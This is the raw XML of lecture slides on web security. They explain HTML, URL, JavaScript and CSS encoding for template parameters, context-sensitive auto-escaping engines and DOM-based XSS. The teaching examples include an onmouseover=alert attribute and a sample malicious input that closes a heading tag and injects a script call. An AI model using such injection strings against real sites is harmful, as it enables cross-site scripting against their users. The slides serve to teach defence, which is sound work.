                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80DFF7DF-9BA8-F9B0-6B39-E7FB75719001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3174164" y="3573275"/>
            <a:ext cx="1118880" cy="545759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8" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCEB0C34-55C3-ACBC-5D74-ABD61C0F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997" y="4064460"/>
            <a:ext cx="2321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5. response with </a:t>
            </a:r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HTML  content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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65559" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1411A098-8CC7-0BDB-379E-53023CA5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95" y="1986527"/>
            <a:ext cx="893055" cy="8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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E000917B-8448-45D5-ACD8-A781B3620BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20040000">
            <a:off x="2782484" y="3558875"/>
            <a:ext cx="1438560" cy="162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5" name="Right Arrow 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABBFC9A5-8D46-C5B5-3297-41D4DBCEFBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5721880" y="3453914"/>
            <a:ext cx="942300" cy="328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Right Arrow 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF4D0F17-5D5A-2A1F-1D9C-7E089D25FC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5778940" y="2955446"/>
            <a:ext cx="913787" cy="3268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Arrow Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00574CC2-E291-4386-C27E-E6847B8D842E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6010208" y="3121004"/>
            <a:ext cx="417600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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC56F523-950C-C4CC-B2CD-3F07157C525A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6011648" y="3612214"/>
            <a:ext cx="416160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 animBg="1"/>
      <p:bldP spid="65543" grpId="0"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="65558" grpId="0"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="15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Encoding for the web - server-side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92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Many sites use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web templating framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to generate web pages.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Below a web template for a web page with parameters written as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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${...}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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;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2 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3       &lt;h1&gt;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 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>h1&gt;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4        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${description}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5       &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="https://ourdomain.nl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>contact?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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${username}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&amp;lang=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${lang}"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User info for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6  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&lt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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onmouseover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=alert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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome to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firstname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}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’s page")&gt;Click here for a pop-up&lt;/b&gt;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7    &lt;/body&gt;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8    &lt;/html&gt;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</a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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Parameters – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>properly encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– are filled by web server / templating engine.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How should the parameters be encoded here?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2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Encoding for the web - server-side  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93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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;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&lt;h1&gt;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 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>h1&gt;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  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${description}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 &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>="https://ourdomain.nl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>contact?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=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${username}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&amp;lang=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${lang}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;Contact details for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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400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&lt;b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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onmouseover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=alert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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’s page")&gt;Click here for a pop-up&lt;/b&gt;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&lt;/body&gt;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&lt;/html&gt;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NB all these encodings can be done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server-side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Getting this right is tricky!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509DC-FA6F-F764-364C-9D5F17181C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4388539" y="1586047"/>
            <a:ext cx="3314754" cy="3385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HTML encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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&lt;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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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29860-CEF0-5303-EE29-6929D49DFAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3701860" y="4140272"/>
            <a:ext cx="425451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JavaString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literal encoded (</a:t>
            </a:r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"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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933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8A2F4-77C6-63FA-FA38-11B264D8B9FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2915816" y="1924601"/>
            <a:ext cx="1980542" cy="60960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801A49-9A92-3804-B51A-2974021AEAB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23728" y="1921426"/>
            <a:ext cx="2772630" cy="102396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0947A6-050F-5BA7-679A-73D31C7B3820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5148064" y="1924601"/>
            <a:ext cx="2160240" cy="128837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9ECDE5-2413-C564-E0DF-51441E532289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657602" y="2531034"/>
            <a:ext cx="2452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URL encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="16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E721A6-ACE1-5F2F-A550-54FC96975C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5124" y="2869588"/>
            <a:ext cx="70892" cy="34338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56F63B-9B9A-1C03-8C16-9DC42D7A77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9526" y="3722099"/>
            <a:ext cx="231377" cy="41817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3850E9-07E8-6D64-7594-A2094AA153FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5436096" y="2869588"/>
            <a:ext cx="144016" cy="34338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76121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7D919A7A-BBDD-47FA-6B2F-064D5458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Some of the encodings for the web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EB06F-4CC7-E2D5-B9F3-BBD54C5C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61288" cy="51845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HTML encoding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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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 &amp; ” ’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&amp;amp; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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&amp;#39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Complication: encoding of attribute inside HTML tag may be different  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URL encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> %-encoding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 ? = % #  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>replaced by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%2F %3F %3D %25 %23 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space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%20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or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endParaRPr lang="en-GB" sz="1633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US" sz="1600" spc="-1" dirty="0"/>
              <a:t>Try this out with e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" spc="-1" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>https://duckduckgo.com/?q=%2F+%3F%3D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US" sz="1600" spc="-1" dirty="0"/>
              <a:t>Complication: encoding for query segment different than for initial part, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" spc="-1" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" spc="-1" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" spc="-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spc="-1" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" spc="-1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%2F</a:t>
            </a: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JavaScript string literal encoding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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>replaced by    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\’  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1633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     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Eg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a JS string with a \’ in the middle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  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Complication: JavaScript allows both ' and "  for strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342853"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CSS encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342853">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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16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endParaRPr lang="en-GB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853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457153" lvl="1" indent="0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accent2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69636" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78FE7DF-043A-645D-7875-F8D9141C8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492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B0FC9FE1-B1D2-4F8A-A490-645F202403D9}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-GB" alt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492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94</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-GB" alt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39903-B9A6-D6C5-276B-01D58D52A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Context-sensitive auto-escaping web template engines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>try to figure out &amp; insert the right encodings.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E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Closure Templates, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using context &amp; encodings below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Many template engines are not context sensitive!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73A6D-A8FD-C649-EE89-239F61B4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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="551471" y="3394185"/>
            <a:ext cx="6156176" cy="224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FDC41-4F3F-65CB-01BF-7346A112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Context-sensitive auto-escaping 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464FB-6201-E92D-147F-ADA6B08F51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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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4FCE8-3923-AF41-CF92-4604AA19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73" y="2655116"/>
            <a:ext cx="3173127" cy="1347809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Tekstvak 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC57341F-CCB3-CA45-8C13-D3D49775CC0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="5824317"/>
            <a:ext cx="6462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[Samuel, Saxena, and Song, </a:t>
            </a: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Context-sensitive auto-sanitization in web templating languages using type qualifiers,</a:t>
            </a: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CCS 2017]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6BE9C-2432-553C-FA16-81BB64B6AEDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791030" y="4012547"/>
            <a:ext cx="341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contexts (type qualifiers)  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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9FFD4-7D24-721E-9E81-49401A6D6BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="304647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encodings inserted</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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646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2C72-E5F3-88BA-4FB2-C383D2B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Extra complication: the DOM API</a:t>
            </a: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6333-8F45-6503-EF66-4BAF7E0AE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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" alt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95DD-71C6-0CDC-DE9F-E0E9E7B72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JavaScript inside a web page can dynamically alter that web page                       using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(or do other interactions with other Web APIs)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&lt;html&gt;   &lt;body&gt;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&lt;h1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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id=title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a: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${name}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  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>h1&gt; </a:t>
            </a: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 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...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&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>newName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getSomeData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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document.getElementById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GB" altLang="nl-NL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title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")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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.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=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>newName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> + "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Blog!";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 Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     &lt;script&gt;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 &lt;/body&gt;   &lt;/html&gt;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Spot the XSS!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>       A malicious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 err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>newName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GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>could be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Eve&lt;/h1&gt;&lt;script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someAttackScript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();&lt;/script&gt; //</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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newName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is untrusted user input, it needs to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, by the JS code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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document.getElementById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("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>title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").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="14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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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 =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="14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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>newName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) + "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&amp;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apos;s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Blog!"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199BB-3095-E9BA-C72A-2A398925EF79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318232" y="2060848"/>
            <a:ext cx="326044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DOM API methods &amp; fields</a:t>
            </a:r>
          </a:p>
          <a:p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to inspect &amp; alter the web page</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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74FFED-F7B0-045D-F0AC-4B3C649D3F8D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6444" y="2645623"/>
            <a:ext cx="1068110" cy="47042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A766B3-C1E5-42A7-5124-ADAF7BA5B6BB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7864" y="2531270"/>
            <a:ext cx="1970368" cy="60969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58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400" dirty="0"/>
              <a:t>DOM-based XSS attacks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3754-F7FE-BCF4-D825-EDCFA919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JavaScript code in a webpage is fed some malicious input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client-side!) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and uses that input to change the webpage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(client-side!)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1800" dirty="0"/>
              <a:t>Input can come 1) via local user input, 2) as parameters in the URL, 3) from the server (as in stored XSS), 4) from another web server,...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Server cannot validate or encode such inputs! (Except in case 3?)           It has to be done by JS code inside the web page.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endParaRPr lang="en-GB" sz="18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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
